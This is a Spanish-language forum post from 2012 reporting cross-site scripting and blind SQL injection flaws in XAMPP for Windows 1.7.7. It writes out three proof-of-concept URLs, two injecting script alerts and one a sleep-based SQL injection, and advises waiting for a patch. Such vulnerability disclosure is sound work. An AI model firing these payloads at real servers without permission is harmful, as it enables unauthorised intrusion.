comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

XAMPP Windows 1.7.7 vulnerable a SQL Injection & XSS

  • 0 Respuestas
  • 1714 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Aryenal.Bt

  • *
  • Underc0der
  • Mensajes: 262
  • Actividad:
    0%
  • Reputación 0
  • "El hombre creyéndose sabio se volvió necio"
    • Ver Perfil
    • Email
« en: Junio 16, 2012, 01:19:59 am »

Como sabemos XAMPP es un servidor de plataforma independiente, software libre, que consiste principalmente en una base de datos MySQL, el servidor web Apache y los intérpretes para lenguajes de script: PHP y Perl, perfecto para una rápida instalación de un mini-servidor en nuestro localhost. Recientemente en http://packetstormsecurity.org/files/113614 han subido un paper con 2 XSS y 1 Blind SQL Injection...

La versión afectada es XAMPP Windows 1.7.7, y como justamente lo tengo instalado (es la última versión oficial de XAMPP) fue que probé los bugs... Y en efecto era vulnerable:

Vulnerabilidades XSS:

http://localhost/xampp/perlinfo.pl/"<script>alert("XSS")</script>
http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
Este de arriba, todavía no se arregla desde la versión 1.7.4

Blind SQL Injection:
http://localhost/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606

Como dije arriba, XAMPP Windows 1.7.7 es la útlima versión oficial, así que la recomendación es que esperes la actualización y que lo desactives si tienes mucha información de importancia.

Fuente: [Blackploit]
« Última modificación: Junio 16, 2012, 04:58:24 am por Aryenal.Bt »

 

¿Te gustó el post? COMPARTILO!



Nuevo Exploit 0day para Internet Explorer 7, 8, 9 en Windows XP, Vista y 7

Iniciado por CalebBucker

Respuestas: 1
Vistas: 2331
Último mensaje Septiembre 17, 2012, 04:49:25 pm
por Slore
MS14-060 Microsoft Windows OLE Package Manager Code Execution Exploit

Iniciado por Stuxnet

Respuestas: 1
Vistas: 3470
Último mensaje Octubre 24, 2014, 09:18:14 pm
por zekurity
[video] Introducción al Exploiting en Windows x86 by UND3R (Corelan)

Iniciado por .:UND3R:.

Respuestas: 0
Vistas: 2893
Último mensaje Marzo 21, 2018, 12:40:31 pm
por .:UND3R:.
Crackear password de administrador en windows usando Backtrack 3

Iniciado por dracko.rx

Respuestas: 0
Vistas: 2286
Último mensaje Febrero 25, 2010, 11:25:50 am
por dracko.rx
CVE-2015-1701 : Windows 7 privilege escalation vulnerability

Iniciado por LionSec

Respuestas: 8
Vistas: 4374
Último mensaje Mayo 22, 2015, 08:02:27 pm
por rand0m